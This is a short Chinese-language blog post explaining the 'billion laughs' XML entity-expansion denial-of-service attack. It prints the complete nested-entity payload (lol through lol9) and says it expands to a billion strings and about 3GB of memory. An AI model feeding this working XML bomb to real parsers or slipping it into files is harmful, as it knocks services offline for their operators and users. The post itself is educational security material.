billion laughs attack

最新推荐文章于 2023-02-28 22:38:33 发布
最新推荐文章于 2023-02-28 22:38:33 发布
阅读量2.5k 收藏 2
点赞数 4
分类专栏: 网安 文章标签: w

0x00 前记

    a billion laughs attack 是一种 denial-of-service(DoS)攻击,它主要作用于XML文档解析器。它也被称为指数实体扩展攻击,是一种名副其实的XML炸弹。

0x01 实例

    该攻击通过创建一系列递归的XML定义,在内存中产生上十亿的特定字符串,从而导致DoS攻击。原理为:构造恶意的XML实体文件以耗尽服务器可用内存,因为许多XML解析器在解析XML文档时倾向于将它的整个结构保留在内存中,上亿的特定字符串占用内存达到GB级,使得解析器解析非常慢,并使得可用资源耗尽,从而造成拒绝服务攻击。

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

    如以上代码所示,在XMl中定义了一个实体lol9,它的值包含了十个实体lol8的值,而每个lol8又包含了十个lol7的值...最后产生10亿个“lol”字符串,占用内存约高达3GB。

0x03 参考资料

    维基百科billion laughs(https://en.wikipedia.org/wiki/Billion_laughs_attack

帅气的吴先生
关注
专栏目录
python dos攻击_Python DOS预防十亿笑声攻击
weixin_26636643的博客
08-13 1674
python dos攻击 什么是DoS? (What is DoS?) Before we dig into the “Billion Laughsattack or how to go about protecting your applications, let me give a quick overview of what DoS is. DoS stands for denial-o...
XXE(XML External Entity attack)XML外部实体注入攻击
xiaoi123的博客
08-15 2190
导语   XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。   尽管XXE漏洞已经...
BillionLaughs.xml
08-18
BillionLaughs.xml
python网络攻击总参三部_注入攻击等Python语言中的十个常见安全漏洞,附修复及避免方法...
weixin_39704971的博客
11-23 608
编写安全的代码很困难,当你学习一门编程语言、一个模块或框架时,你会学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,Python也不例外,即使在标准库中,也存在着许多糟糕的实例。然而,许多 Python 开发人员却根本不知道这些。以下是我总结的10个Python常见安全漏洞,排名不分先后。1、输入注入注入攻击影响广泛且很常见,注入有很多种类,它们影响所有的语言、框架和环境。SQL 注入...
SVG 安全
weixin_41806099的博客
12-28 1109
一 任务目标 本篇文章的目的有:[ ] 了解 SVG 漏洞[ ] 了解 SVG 常见防护手段[ ] 搜寻 SVG 数据安全性校验和过滤的库[ ] 了解如何使用此类库来进行 SVG 上传防护[ ] 阅读源码,能明确讲述此类库做了什么如果对你有所帮助,不妨点赞、评论、收藏和吐槽一番~二 SVG 简要介绍 SVG 即可缩放矢量图形(Scalable Vector Graphics),它使用 XML 格式...
学习 Python 这么多年,掉过的那些安全漏洞
CSDN资讯
07-05 2435
编写安全的代码很难。学一门语言、一个模块或一个框架时,你学到的是它应该怎么用。而在安全方面,你需要考虑它们能怎样被滥用。Python 也不例外,即使标准库的文档里已经清清...
Injection Attack
一小平民
02-01 3392
Injection Attacks The OWASP Top 10 lists Injection and Cross-Site Scripting (XSS) as the most common security risks to web applications. Indeed, they go hand in hand because XSS attacks are conting
Having Fun with XML Hacking
04-13
2. **Billion Laughs Attack**:这是一种拒绝服务(DoS)攻击,由于XML解析器处理大量嵌套的递归实体时会消耗大量资源,导致内存溢出或CPU过载。 3. **DTD (Document Type Definition) Injection**:通过篡改DTD,...
java审计之XXE
Hq_Dream的博客
01-20 2129
java审计之XXE 有很久很久没更新这个csdn博客了,忽然想下载个资料发现没积分了,嗯额,分享个最新更新的文章。文章首发是个人的另一个博客 最近审计公司的xxx项目(java方面),对于我也是刚接触java方面的审计,边学习边审计,其中发现了几个有意思的blind xxe于是单独挑出XXE深入研究下,我觉得有必要page记录一下审计与学习的内容,对于xxe方面内容可能还不是太完整后续再添加吧,...
Python中的10个常见安全漏洞及修复方法
最新发布
gaojian5422的博客
02-28 2063
Python中的10个常见安全漏洞及修复方法
java安全编码指南之:拒绝Denial of Service
rexuejava的博客
08-26 213
简介 DOS不是那个windows的前身,而是Denial of Service,有做过系统安全方面的小伙伴可能对这个再熟悉不过了,简单点讲,DOS就是服务型响应不过来,从而拒绝了正常的服务请求。 今天本文不是要讲怎么发起一个DOS攻击,而是讲一下怎么在java的代码层面尽量减少DOS的可能性。 为什么会有DOS 为什么会有DOS呢?排除恶意攻击的情况下,DOS的原因就是资源的使用不当。一般意义上我们所说的资源有CPU周期,内存,磁盘空间,和文件描述符等。 如果这些资源受到了恶意使用,..
Web安全-XXE漏洞
道阻且长,行则将至。
11-25 2656
XML简介 1、定义 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 2、文档结构 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 <!--XML声明--> <?xml version="1.0"?> <!--文档类型定义--> <!DOCTYPE no...
如何撰写英文论文
热门推荐
小白
11-16 2万+
最近在写英文论文,想到老板曾分享给大家的文章,拿来看了看,深感有用。       此文仅关注怎么写英文论文,论文的水准就不管了。 参考1: 如何撰写高水平国际期刊论文(吴红飞) http://mp.weixin.qq.com/s?__biz=MzAxMzgyMjMwMQ==&mid=2651812101&idx=1&sn=37c10962a08b2d6dbbbbf2385bf4fe3
XML 实体扩展攻击
weixin_34232744的博客
03-24 969
2019独角兽企业重金招聘Python工程师标准>>> ...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9048
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
FM24C256: 256KB Ferroelectric RAM with 10Billion Endurance and Advanced Features
FM24C256是一款由RAMTRON International Corporation生产的高性能非易失性随机存取存储器(RAM)芯片,其规格符合公司的标准保修条款。这款产品经过了内部严格的1850 Ramtron Drive, Colorado Springs, CO 80921工厂的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值